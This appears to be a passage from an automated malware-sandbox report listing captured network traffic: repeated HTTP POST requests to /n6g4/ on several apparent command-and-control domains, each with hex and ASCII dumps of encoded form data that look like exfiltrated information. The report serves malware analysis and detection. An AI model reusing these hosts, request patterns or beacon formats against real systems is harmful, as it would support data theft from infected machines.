34 4c 72 79 77 61 49 44 2d 74 43 42 68 71 75 72 36 6f 78 50 76 4a 68 48 37 34 74 4d 32 39 65 77 68 73 47 38 4f 48 36 28
Source: global traffic	HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.kickball.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.kickball.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.kickball.site/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 5a 4e 45 5a 34 68 33 30 28 71 39 44 6e 45 76 73 72 5a 49 6e 36 41 6b 32 52 32 42 6e 4c 49 58 75 79 44 6f 78 4b 39 65 5f 67 73 78 61 49 79 58 35 58 51 65 5a 78 6f 48 66 53 49 56 46 4e 38 66 38 65 6c 57 59 74 6c 44 44 69 38 54 41 76 35 32 35 47 65 48 68 62 38 68 63 59 49 4b 72 44 35 6e 4d 32 6a 48 30 50 54 56 42 78 59 32 73 53 55 50 68 52 67 35 44 68 66 42 50 55 61 78 5a 67 31 78 5f 6c 79 37 78 7e 57 34 76 6d 52 59 5f 79 55 45 64 6a 6d 4b 63 45 46 43 6e 77 37 6d 55 71 7a 6b 6a 58 64 4c 6a 53 48 59 36 4c 61 4a 4b 4a 71 74 75 64 4d 32 77 44 64 41 34 37 33 28 54 51 62 34 43 36 4f 59 6c 35 64 46 78 65 76 4f 77 6a 71 69 33 33 32 6e 49 63 48 58 64 58 5f 49 51 6f 49 42 63 72 31 70 5f 73 73 61 47 52 4d 58 55 48 69 66 61 70 65 33 45 35 38 57 4f 6d 59 45 33 44 72 6f 57 4a 30 77 74 67 5f 64 64 54 4d 4d 41 57 69 61 7a 45 37 4d 58 37 53 77 74 48 68 71 6b 38 31 55 4b 4a 44 76 66 4e 33 47 49 46 75 4a 6e 6b 41 44 39 4a 56 76 75 4a 5f 48 45 6f 6b 47 64 69 61 54 45 28 7a 33 32 6f 75 54 54 69 66 66 44 6f 72 67 75 74 59 44 36 56 37 4d 61 4d 4c 54 44 30 53 39 76 69 4a 38 57 45 38 56 33 58 52 4f 5a 41 67 71 31 61 71 4e 44 45 44 76 32 62 72 38 44 47 43 6a 6f 62 33 57 6e 79 6d 4a 42 6f 71 6a 58 46 4e 78 47 76 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=ZNEZ4h30(q9DnEvsrZIn6Ak2R2BnLIXuyDoxK9e_gsxaIyX5XQeZxoHfSIVFN8f8elWYtlDDi8TAv525GeHhb8hcYIKrD5nM2jH0PTVBxY2sSUPhRg5DhfBPUaxZg1x_ly7x~W4vmRY_yUEdjmKcEFCnw7mUqzkjXdLjSHY6LaJKJqtudM2wDdA473(TQb4C6OYl5dFxevOwjqi332nIcHXdX_IQoIBcr1p_ssaGRMXUHifape3E58WOmYE3DroWJ0wtg_ddTMMAWiazE7MX7SwtHhqk81UKJDvfN3GIFuJnkAD9JVvuJ_HEokGdiaTE(z32ouTTiffDorgutYD6V7MaMLTD0S9viJ8WE8V3XROZAgq1aqNDEDv2br8DGCjob3WnymJBoqjXFNxGvw).
Source: global traffic	HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.kickball.siteConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.kickball.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.kickball.site/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 5a 4e 45 5a 34 6a 7a 59 79 37 51 44 72 30 69 43 71 4d 73 7a 77 51 30 30 58 47 4e 69 53 70 4c 31 31 79 34 62 58 73 75 43 75 4f 78 45 5a 32 7a 55 54 58 54 4b 78 71 76 6d 59 71 68 42 48 38 62 5f 65 68 79 6d 74 6c 48 44 6a 39 36 4c 75 65 53 66 46 39 76 69 63 63 68 4b 4b 49 4b 75 48 34 36 71 32 6a 44 47 50 54 64 76 78 74 71 73 53 33 6e 68 54 6e 46 2d 76 66 42 4e 49 4c 42 7a 6b 31 73 41 6c 79 6a 58 7e 54 51 76 6e 68 63 5f 7a 33 4d 65 68 68 7e 62 63 46 43 75 7a 4c 6d 33 68 54 6f 33 58 64 48 4e 53 47 6b 36 4c 50 52 4b 4c 36 4e 75 66 37 69 7a 61 39 41 78 77 58 28 55 55 62 31 4d 36 4f 45 70 35 5a 31 4c 65 64 53 77 6a 61 69 32 68 48 76 41 59 51 36 46 56 38 55 33 6f 49 4e 31 72 67 77 71 73 75 66 54 57 39 6e 5a 4d 6b 71 4e 70 64 62 36 30 38 57 56 74 34 46 72 44 72 6f 63 4a 30 78 4f 67 2d 4e 64 54 50 73 41 57 42 79 7a 4d 37 4d 51 75 53 77 52 4c 42 72 32 34 77 4d 30 4a 44 33 6c 4e 32 7e 59 46 61 31 6e 72 77 7a 39 65 43 37 70 51 76 48 47 73 6b 47 38 6f 36 54 42 28 7a 33 55 6f 71 47 55 6a 6f 48 44 70 36 67 75 39 4c 6e 36 58 4c 4d 61 51 37 54 37 28 79 67 79 69 49 59 53 45 39 6b 49 58 69 69 5a 44 31 7e 31 61 4c 4e 44 49 54 76 32 54 4c 39 45 4c 68 61 46 59 6c 43 76 7e 6d 45 71 68 75 43 7a 4e 64 68 4f 31 45 56 42 78 77 33 4b 36 4b 4f 34 48 54 55 33 79 44 4d 41 42 53 64 76 62 37 58 70 6e 57 7a 59 57 4d 39 38 6c 71 52 48 35 6f 4f 7a 31 42 67 2d 53 70 43 54 79 58 28 62 49 41 6c 41 7a 6d 52 75 43 51 39 74 39 41 4a 2d 73 6a 76 58 4f 4d 7e 7a 4d 34 42 6b 6e 7a 4b 7a 49 69 55 32 6b 72 30 5a 6c 6a 73 70 68 72 49 45 79 44 56 45 59 32 73 46 73 35 6e 58 6f 68 54 45 78 73 50 61 75 42 6e 70 77 5f 35 52 72 33 33 64 70 4e 34 69 42 78 39 32 4d 4f 64 43 63 67 47 42 52 4b 62 70 6c 52 41 32 46 6c 52 71 71 6f 72 51 67 72 53 51 4c 62 4c 46 70 76 69 46 34 52 76 41 76 4d 59 33 4d 4d 73 76 48 53 74 41 39 49 77 4f 6b 43 56 41 34 56 64 66 61 59 31 41 6b 4d 43 49 4d 46 4c 78 51 51 64 6a 57 67 59 58 4a 43 42 73 70 66 79 6d 53 37 47 4a 47 71 36 45 57 6f 6e 59 4e 78 44 32 76 66 41 54 6f 32 56 63 38 48 49 54 37 67 4b 2d 43 56 52 69 41 4a 75 6f 56 7a 33 62 68 37 65 55 72 37 75 76 37 66 59 43 32 47 6d 66 78 6e 5a 2d 4f 5a 77 65 7e 70 47 33 39 71 4a 70 43 5f 49 44 4d 46 4a 41 46 48 33 79 58 74 68 64 7a 7a 6c 41 35 4f 68 76 58 4f 72 74 6d 4e 6d 65 78 56 28 41 55 39 58 38 46 31 34 6e 52 33 4d 57 4a 4a 48 43 67 4c 4f 75 7e 78 4e 50 6d 4e 5a 68 6e 73 54 36 6a 55 74 6f 75 46 67 5f 7a 4a 4f 5f 61 4c 39 38 72 70 66 4a 65 72 66 2d 4e 48 6a 50 4b 75 4a 46 67 75 32 65 53 65 37 6b 33 4e 4b 4b 6a 4c 69 4e 46 35 42 6f 6a 38 54 43 4f 61 33 4f 44 51 64 70 4c 69 38 5a 7e 5f 37 44 63 79 57 36 48 52 35 74 6e
Source: global traffic	HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.bldh45.xyzConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.bldh45.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.bldh45.xyz/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 52 70 4c 67 49 62 6c 5f 30 63 7e 41 70 57 36 7a 77 43 37 73 6e 64 69 62 74 4c 7e 42 6d 38 77 36 4d 76 48 76 67 79 33 58 4f 6c 39 54 50 49 38 45 63 34 50 74 4e 68 53 44 74 5f 7a 44 28 38 4e 79 30 31 42 56 65 30 39 63 44 35 50 51 73 38 53 55 6c 51 51 70 76 54 5a 46 59 55 45 4e 71 53 54 56 38 42 30 4d 57 47 35 47 65 53 6f 49 73 70 4a 58 72 50 33 41 79 48 72 68 77 71 6e 5f 50 6b 48 74 6a 64 79 79 43 69 42 5a 44 54 33 46 59 42 62 68 6d 6e 72 69 30 52 38 58 38 59 71 37 78 34 39 64 59 54 65 71 68 66 69 4a 70 6c 63 49 53 2d 70 4a 4e 32 75 65 74 47 65 4c 32 4d 62 76 62 53 72 5f 7a 6b 68 46 74 61 76 50 50 46 28 6f 77 52 77 6d 4c 47 74 4f 7e 7a 63 67 46 44 36 59 4e 4a 77 55 77 6a 62 6b 4d 4b 76 70 30 6b 41 54 6b 69 36 5f 6f 7a 66 67 6e 52 42 79 79 49 78 6f 6b 32 76 79 30 31 37 55 6d 6f 77 73 5a 71 37 51 42 54 4a 4f 35 70 42 4c 6f 49 6b 53 46 74 77 66 37 66 52 67 57 63 46 6e 65 58 56 45 72 66 61 4a 68 39 63 41 53 43 78 42 79 4e 62 45 43 32 58 44 69 77 66 67 49 59 7a 6e 33 44 43 36 6c 6a 41 46 79 4c 57 39 70 51 64 41 73 63 71 6b 7a 31 59 31 55 30 47 4d 4d 33 72 33 39 77 75 55 36 71 76 64 59 79 69 6d 71 5f 6e 68 69 33 49 6b 7e 48 7e 70 37 75 62 42 36 45 31 55 69 5a 6e 73 47 77 73 79 28 37 7a 35 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=RpLgIbl_0c~ApW6zwC7sndibtL~Bm8w6MvHvgy3XOl9TPI8Ec4PtNhSDt_zD(8Ny01BVe09cD5PQs8SUlQQpvTZFYUENqSTV8B0MWG5GeSoIspJXrP3AyHrhwqn_PkHtjdyyCiBZDT3FYBbhmnri0R8X8Yq7x49dYTeqhfiJplcIS-pJN2uetGeL2MbvbSr_zkhFtavPPF(owRwmLGtO~zcgFD6YNJwUwjbkMKvp0kATki6_ozfgnRByyIxok2vy017UmowsZq7QBTJO5pBLoIkSFtwf7fRgWcFneXVErfaJh9cASCxByNbEC2XDiwfgIYzn3DC6ljAFyLW9pQdAscqkz1Y1U0GMM3r39wuU6qvdYyimq_nhi3Ik~H~p7ubB6E1UiZnsGwsy(7z5iA).
Source: global traffic	HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.bldh45.xyzConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.bldh45.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.bldh45.xyz/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 52 70 4c 67 49 61 4a 51 74 76 4b 72 32 33 47 59 6a 6e 66 6a 7a 39 79 64 75 37 4c 50 6f 59 6b 78 4f 74 28 37 39 6e 4b 76 50 67 49 47 4c 34 67 70 58 66 71 6f 4e 68 44 6e 68 70 44 66 37 63 42 78 30 31 5a 37 65 31 4a 63 43 36 50 41 73 64 44 78 6d 7a 34 6d 72 7a 5a 54 5a 55 46 4c 75 51 33 30 38 42 41 69 57 47 42 6f 64 68 38 49 73 4e 68 58 38 59 6a 4a 39 48 71 71 7e 4b 33 72 42 45 44 6a 6a 5a 6e 74 43 69 39 5a 43 6a 37 46 59 67 4c 6d 67 6b 54 74 7a 42 38 57 70 6f 71 79 7e 59 34 6b 59 54 61 49 68 61 43 4a 75 58 34 49 44 39 68 4a 4a 33 75 64 7e 32 65 4f 67 38 62 59 4e 69 6e 55 7a 6b 39 7a 74 62 62 31 4d 33 6a 6f 77 68 77 64 50 58 6c 38 30 41 31 69 48 41 6e 30 4e 4a 73 78 77 58 54 73 4d 4c 76 4a 39 79 4e 37 36 55 47 56 6f 78 7a 65 68 78 42 32 38 6f 77 30 6b 32 75 46 30 31 37 36 6d 70 67 73 5a 70 4c 51 43 77 78 4f 79 70 42 49 7e 6f 6b 55 4d 4e 77 45 28 66 55 48 57 63 63 49 65 57 4e 2d 7e 38 75 4a 69 4a 59 41 48 78 70 4f 35 4e 62 43 47 32 57 52 31 67 66 72 49 59 7a 5a 33 48 32 71 6c 51 30 46 77 65 36 39 75 7a 31 41 76 73 71 6b 32 31 59 37 64 55 4c 4a 4d 78 44 37 39 78 7e 62 36 62 72 64 59 45 57 6d 71 62 54 68 69 48 49 6b 79 6e 28 59 30 64 71 72 28 78 68 64 7a 49 33 5f 4a 51 39 59 35 37 32 30 67 54 4f 72 34 64 44 48 6e 69 53 73 75 44 55 73 49 37 43 50 35 52 46 67 62 68 4f 31 67 70 66 77 71 63 78 65 4b 52 4b 33 38 79 63 38 64 51 59 45 63 76 6f 48 6a 4f 63 52 59 30 35 44 33 4c 4d 37 38 32 4e 6e 66 6a 4a 39 28 4c 35 33 7a 6e 6f 78 78 4b 55 4a 4c 42 28 74 61 65 36 69 4a 41 61 76 65 57 6c 74 58 56 4c 78 63 49 51 46 39 34 38 74 7a 44 6a 44 71 64 63 5a 56 48 4d 44 68 45 6e 36 71 4e 7e 63 67 42 69 71 59 58 45 57 4b 48 74 55 7a 39 32 52 62 52 33 7a 37 6d 50 38 61 67 58 48 57 55 32 33 37 6e 63 6c 51 32 74 36 48 31 48 78 69 4a 48 2d 62 70 4e 70 4d 30 5a 41 36 6c 32 4a 68 55 63 4d 28 68 41 53 4c 31 6f 78 39 63 53 2d 68 61 79 43 57 43 64 64 38 5f 68 39 76 72 45 4d 38 34 68 41 28 50 43 34 50 54 6c 57 4a 32 4c 51 71 6d 6a 6e 58 42 28 47 56 47 34 4e 6f 64 72 68 75 70 34 49 7a 33 50 55 61 58 7e 57 48 59 4e 2d 76 4f 57 4d 47 56 72 6b 79 6c 61 65 77 74 4c 44 66 68 4b 69 65 4a 78 37 78 76 77 73 31 6f 46 31 6f 75 41 49 41 66 28 30 68 59 49 54 7e 68 47 76 6c 34 70 36 4c 43 63 73 55 78 5a 43 53 65 43 53 75 59 69 4a 62 5f 61 45 4c 46 61 72 6c 74 50 44 6a 58 6b 33 4d 64 71 4c 72 30 38 70 32 75 33 59 35 4b 39 37 41 48 57 6a 57 35 36 6a 66 53 6c 30 68 32 34 35 49 4c 47 5a 37 33 53 53 78 4f 65 6a 35 67 45 38 75 59 28 76 41 7a 77 77 28 62 6a 32 53 2d 34 51 76 66 58 44 76 54 28 59 64 69 47 4c 56 72 69 47 6e 39 4e 54 41 77 32 30 30 71 62 41 47 30 49 6e 7a 78 38 38 68 53 67 30 6f 71 32 4b
Source: global traffic	HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.properscooter.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.properscooter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.properscooter.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 4d 63 72 58 76 50 6c 39 44 31 61 41 74 71 5a 4c 36 5a 4f 71 77 51 61 46 76 46 6d 52 54 51 73 63 59 70 53 5a 4c 4e 54 6d 51 5a 53 5a 4b 47 37 6d 62 59 79 45 76 79 6e 74 35 74 4b 61 70 61 4b 71 69 6b 45 66 58 46 53 6d 49 73 68 71 4b 7a 47 44 36 4b 4c 68 35 37 58 35 31 2d 53 6b 63 6d 75 39 37 39 61 63 76 45 56 42 57 48 57 4d 76 6c 74 79 78 6b 71 4a 70 73 4d 68 75 75 51 6e 76 72 63 54 39 69 52 55 32 64 62 6d 76 54 4a 35 7e 4d 6d 46 74 39 41 37 47 32 74 53 46 61 6b 78 58 63 43 31 4c 61 4c 42 58 6b 7a 48 4c 58 76 50 44 57 56 38 69 59 34 6e 30 41 75 4e 6d 65 74 49 6c 7a 4a 69 4d 61 56 73 48 5a 58 50 43 48 7e 35 64 38 52 35 65 75 4b 47 6d 76 64 41 72 42 28 59 30 72 67 47 4c 50 58 65 4f 4c 39 78 63 57 4c 43 28 49 4c 37 4d 71 49 78 64 62 38 70 6b 6f 65 5a 6f 5f 6b 4b 63 72 77 45 28 54 75 38 6d 38 74 38 4c 2d 65 5f 52 6f 43 64 5a 72 78 6b 59 53 68 42 28 30 68 63 52 4a 73 74 45 59 4f 37 67 42 39 32 42 6e 61 65 45 6e 76 2d 45 34 78 5a 38 45 64 5a 72 52 74 72 37 69 6c 36 39 4f 33 73 44 67 58 58 67 4b 73 4e 41 4d 79 50 62 31 57 71 73 55 7e 55 32 4f 65 62 42 51 64 5a 76 4b 45 56 46 68 31 63 54 70 6c 55 36 44 54 47 33 48 76 31 74 77 37 6e 50 6b 69 64 41 36 79 5f 73 65 78 77 50 34 53 55 59 39 68 49 48 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=McrXvPl9D1aAtqZL6ZOqwQaFvFmRTQscYpSZLNTmQZSZKG7mbYyEvynt5tKapaKqikEfXFSmIshqKzGD6KLh57X51-Skcmu979acvEVBWHWMvltyxkqJpsMhuuQnvrcT9iRU2dbmvTJ5~MmFt9A7G2tSFakxXcC1LaLBXkzHLXvPDWV8iY4n0AuNmetIlzJiMaVsHZXPCH~5d8R5euKGmvdArB(Y0rgGLPXeOL9xcWLC(IL7MqIxdb8pkoeZo_kKcrwE(Tu8m8t8L-e_RoCdZrxkYShB(0hcRJstEYO7gB92BnaeEnv-E4xZ8EdZrRtr7il69O3sDgXXgKsNAMyPb1WqsU~U2OebBQdZvKEVFh1cTplU6DTG3Hv1tw7nPkidA6y_sexwP4SUY9hIHg).
Source: global traffic	HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.properscooter.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.properscooter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.properscooter.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 4d 63 72 58 76 4f 4a 56 48 45 48 51 6f 36 55 64 35 76 43 45 37 41 4b 48 74 31 71 55 5a 79 70 45 50 34 44 39 57 5a 58 66 43 4a 36 66 4f 79 6a 48 52 5f 65 6d 76 7a 57 44 77 2d 7e 57 36 4b 4f 72 69 6b 63 41 58 46 57 6d 4c 73 5a 36 4a 55 44 6f 39 73 33 67 36 62 57 63 30 2d 54 69 59 6b 62 79 37 39 65 45 76 48 30 61 57 33 36 4d 7e 32 56 79 6d 7a 57 30 6b 73 4d 37 6e 4f 42 34 77 37 41 64 39 69 5a 4d 32 59 6a 6d 36 7a 46 35 28 6f 69 45 6b 65 34 34 4c 47 74 58 51 71 6c 6e 65 38 65 66 4c 62 28 6a 58 6b 50 48 4c 6c 62 50 46 47 31 38 79 37 41 6d 28 51 75 56 73 2d 73 58 79 6a 31 33 4d 61 4a 67 48 63 6d 79 43 32 4b 35 66 4d 52 30 62 5f 54 37 71 63 6c 58 34 51 62 76 30 72 6b 5f 4c 61 33 57 4f 4a 70 52 61 6c 54 70 78 4b 54 52 4d 76 35 55 52 62 38 6c 38 34 66 62 6f 5f 6b 4d 63 72 77 6d 28 51 47 38 6d 5f 4e 38 45 39 57 5f 58 49 43 65 51 37 78 39 53 79 68 61 75 6b 73 51 52 4a 30 54 45 63 53 42 67 30 39 32 62 57 71 65 4d 67 37 78 4f 34 78 6c 71 30 64 65 76 52 74 65 37 69 6b 74 39 50 32 6e 43 54 7a 58 67 66 59 4e 43 5a 6d 50 64 46 57 71 6a 30 7e 53 28 75 69 4c 42 55 78 64 76 4b 30 5f 45 53 35 63 64 62 42 55 36 6e 6e 47 6b 6e 76 31 68 51 36 46 4a 31 58 30 43 4c 69 79 28 65 5a 4e 53 39 7a 71 64 5f 49 47 57 56 4a 6b 61 5f 66 79 69 57 4c 6d 4b 7a 64 2d 59 73 30 5f 6d 70 61 30 71 4f 62 47 36 46 4a 48 48 68 66 5f 61 5a 7e 71 38 67 68 42 6b 4d 39 49 77 62 49 71 75 39 52 63 56 73 6f 68 55 77 58 4a 41 53 4b 6a 47 42 41 62 63 61 7a 48 4f 5f 44 49 54 55 35 31 73 64 5a 31 4d 44 39 69 78 74 63 39 58 5f 42 52 73 68 42 51 67 6b 74 34 74 65 56 7a 45 47 54 54 5a 77 44 58 43 54 28 77 7e 48 71 74 67 68 57 48 64 42 6a 72 7e 53 4f 5a 6c 70 35 6e 41 57 34 71 34 44 5a 53 50 47 54 76 63 6a 6b 67 6a 6f 67 59 62 53 4c 72 79 61 35 61 55 37 6a 78 54 51 39 44 46 51 44 44 35 67 69 51 47 6e 47 6b 52 7a 6a 73 50 4e 4a 4a 6f 79 51 61 50 54 45 57 44 75 46 46 4c 6f 30 75 78 5f 28 4f 6d 33 47 4e 56 7a 77 4b 43 33 49 36 79 54 45 6f 34 30 73 68 7e 6a 69 4e 37 4f 4c 67 4c 6b 6b 47 47 68 79 44 62 65 69 70 74 71 58 74 6b 76 48 76 6e 52 48 4e 46 44 4c 6c 32 70 63 74 49 52 7a 4e 32 70 64 56 6d 6f 4b 50 37 45 50 4d 69 44 63 50 30 62 73 66 71 6f 45 63 64 69 4c 5f 57 6c 47 66 75 4f 6e 55 49 53 6e 71 7a 61 7a 63 6f 48 41 74 48 4b 5a 32 55 48 54 50 79 79 6b 4b 7e 45 7a 64 30 4c 34 5f 4a 59 41 6d 43 58 45 37 55 59 47 4c 72 72 69 38 6a 31 53 65 55 5a 37 61 74 54 73 4d 5a 61 58 34 67 67 4e 4c 6b 54 46 57 37 46 58 49 6b 61 74 5a 6d 79 6c 6f 45 71 62 64 54 5a 43 44 39 46 53 57 6c 62 7a 70 41 78 44 58 76 50 74 47 67 38 6f 6e 47 46 46 79 51 4f 61 39 55 6a 49 63 56 71 55 2d 59 69 52 73 6c 44 6b 59 4c
Source: global traffic	HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.uspplongee.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.uspplongee.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.uspplongee.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 58 47 30 4a 59 71 51 6e 50 58 6d 4f 6f 44 77 4e 56 54 49 49 67 38 72 48 33 5f 53 4e 6f 6e 45 4e 54 43 66 44 32 43 7e 74 33 74 77 59 73 59 56 75 33 39 67 4b 78 54 4a 58 56 39 7a 70 54 69 49 58 41 59 77 54 59 32 4d 76 6e 74 54 6c 33 50 4b 6d 6d 69 72 39 65 79 52 54 71 4e 68 49 66 39 74 6c 28 57 47 4d 41 56 53 59 32 2d 72 51 70 7a 43 30 69 57 34 67 57 79 30 64 6c 36 53 5a 76 46 5a 6a 58 47 46 32 66 4f 57 4d 4b 43 79 67 75 33 34 45 6b 42 35 64 70 43 38 6d 79 77 4d 6a 6c 6f 35 66 62 30 39 75 65 6f 4f 4e 45 2d 28 52 51 2d 5a 38 32 62 56 76 77 36 30 6b 7e 4b 34 73 7e 57 48 31 4d 75 53 79 79 66 37 6e 35 39 55 30 35 70 39 38 42 34 36 36 53 59 31 44 34 6b 43 4b 73 33 56 4c 69 4c 32 70 38 49 6a 44 4d 52 4a 37 36 41 35 4e 33 51 54 77 54 63 66 48 4c 71 54 35 63 43 6d 32 77 63 77 71 50 5f 4d 69 6f 6b 75 5a 78 77 51 48 32 79 62 32 32 2d 72 38 33 43 36 7a 43 65 73 55 6d 6c 49 48 7a 4c 79 30 39 38 6a 47 54 79 39 66 53 46 63 35 7a 50 72 4c 4e 55 66 4f 59 76 68 77 74 4e 4b 61 41 7a 34 32 6f 62 6c 53 5a 2d 33 58 42 75 4e 71 55 78 71 6d 4a 49 36 43 57 37 36 6c 37 6c 45 62 6d 6b 61 75 43 34 50 73 46 66 5a 68 6a 42 73 46 6d 57 6a 46 35 31 71 31 57 4a 4e 77 28 4f 4d 68 5a 53 74 64 38 48 77 63 28 37 72 4e 66 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=XG0JYqQnPXmOoDwNVTIIg8rH3_SNonENTCfD2C~t3twYsYVu39gKxTJXV9zpTiIXAYwTY2MvntTl3PKmmir9eyRTqNhIf9tl(WGMAVSY2-rQpzC0iW4gWy0dl6SZvFZjXGF2fOWMKCygu34EkB5dpC8mywMjlo5fb09ueoONE-(RQ-Z82bVvw60k~K4s~WH1MuSyyf7n59U05p98B466SY1D4kCKs3VLiL2p8IjDMRJ76A5N3QTwTcfHLqT5cCm2wcwqP_MiokuZxwQH2yb22-r83C6zCesUmlIHzLy098jGTy9fSFc5zPrLNUfOYvhwtNKaAz42oblSZ-3XBuNqUxqmJI6CW76l7lEbmkauC4PsFfZhjBsFmWjF51q1WJNw(OMhZStd8Hwc(7rNfQ).
Source: global traffic	HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.uspplongee.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.uspplongee.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.uspplongee.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 58 47 30 4a 59 72 73 78 42 47 65 62 33 6a 39 62 58 68 6f 48 72 74 62 4a 77 4a 4f 43 30 53 4d 53 55 32 62 32 37 6d 32 35 32 76 67 4e 37 34 67 68 7a 2d 51 43 78 58 4e 2d 62 76 6d 67 43 54 30 55 41 59 34 78 59 32 49 76 6b 75 53 69 33 6f 4f 63 6e 48 28 79 53 79 52 76 34 64 68 52 56 70 4e 49 28 57 79 2d 41 55 72 44 31 4f 58 51 6f 51 71 30 7a 46 41 37 49 69 31 57 74 62 28 47 77 56 64 45 58 47 64 75 66 4f 36 4d 4b 79 75 67 75 57 49 46 77 32 56 61 67 79 38 6e 7e 51 4e 67 75 49 6b 35 62 30 77 42 65 74 32 4e 46 49 58 52 52 75 35 38 28 49 39 67 37 71 30 68 70 61 34 74 36 57 61 73 4d 75 4f 41 79 62 69 51 35 50 49 30 34 5a 39 39 57 5f 6e 48 58 4c 74 74 36 67 44 59 73 33 52 6d 69 66 58 30 38 4a 4f 59 46 45 4e 41 7e 6d 4d 71 33 56 6a 57 53 38 66 44 41 4b 53 74 63 43 6e 58 77 63 77 51 50 5f 38 69 6f 6e 4f 5a 78 54 59 48 30 53 62 78 39 75 71 57 79 43 36 6f 51 75 67 71 6d 6b 67 68 7a 4c 71 4b 39 4f 6e 47 54 69 4e 66 51 6b 63 34 6e 66 72 4e 4a 55 66 56 50 5f 68 31 74 4e 4c 50 41 33 6b 6d 6f 49 68 53 61 4f 62 58 4d 74 6c 71 57 42 71 6d 48 6f 36 41 44 4c 32 4c 37 6c 63 66 6d 68 32 55 42 4c 6a 73 46 4e 52 68 6b 6b 59 46 72 47 6a 46 32 56 72 69 48 70 63 67 30 4e 64 4f 65 45 4a 39 31 51 35 4f 28 72 36 5f 4b 63 69 54 52 38 34 6c 62 36 45 34 6a 49 28 57 34 33 78 36 63 73 38 68 45 74 79 45 69 77 6d 69 63 68 58 30 69 6a 6b 63 28 30 37 43 46 76 4c 36 4b 58 30 78 78 78 55 42 55 34 76 73 79 6a 6f 73 78 55 74 48 67 48 54 7a 49 62 36 52 4b 48 53 55 7a 70 6d 52 77 66 6c 4c 49 7a 41 6d 62 4e 51 65 7a 6b 4e 77 72 74 66 58 48 2d 66 55 57 36 77 69 75 6b 73 6a 57 41 57 4d 63 73 4f 7a 78 58 44 69 47 4a 46 66 5a 6e 78 75 30 46 33 5a 6a 50 4f 4b 7e 61 44 79 4d 76 6a 4b 50 36 34 47 37 76 45 68 4a 4e 37 6d 4d 64 46 70 55 32 76 5f 75 53 64 61 35 6e 6c 34 6f 4d 77 49 48 5f 54 48 5a 6c 6b 54 75 57 70 59 75 79 7a 58 52 64 54 47 6d 5a 54 52 74 39 47 44 71 6e 61 67 65 2d 33 59 54 61 69 67 43 72 62 43 54 7a 71 42 68 44 4f 6d 4f 69 52 4b 7e 4d 4a 61 61 31 66 73 56 6e 47 7a 54 38 37 61 70 53 57 4d 78 5a 30 62 28 7a 30 76 31 44 6a 35 44 6c 74 57 45 38 6e 59 47 4c 7e 35 66 78 4e 53 4e 52 62 74 6d 77 74 34 43 37 4c 76 66 69 57 47 5a 62 64 51 61 62 70 75 45 51 4a 62 73 57 36 63 78 33 74 4a 6e 57 64 30 6c 54 39 78 59 76 63 46 38 53 5a 47 51 62 6e 38 65 6c 61 65 6f 35 63 4c 79 31 67 5f 43 4f 73 56 7a 75 4b 52 64 57 42 73 76 47 31 68 6c 6b 35 4f 70 70 52 37 4d 45 73 51 4b 47 69 63 4c 77 45 35 53 62 6e 73 72 70 6b 42 7a 68 50 68 64 54 4a 70 63 39 37 45 7e 30 79 73 49 46 50 6f 39 73 32 68 4f 74 4d 68 73 6b 48 6b 75 33 66 34 46 47 76 4b 72 43 46 4a 39 75 66 59 43 59 4b 79 6b 69 47 39 49 71 50 54

Source: global traffic

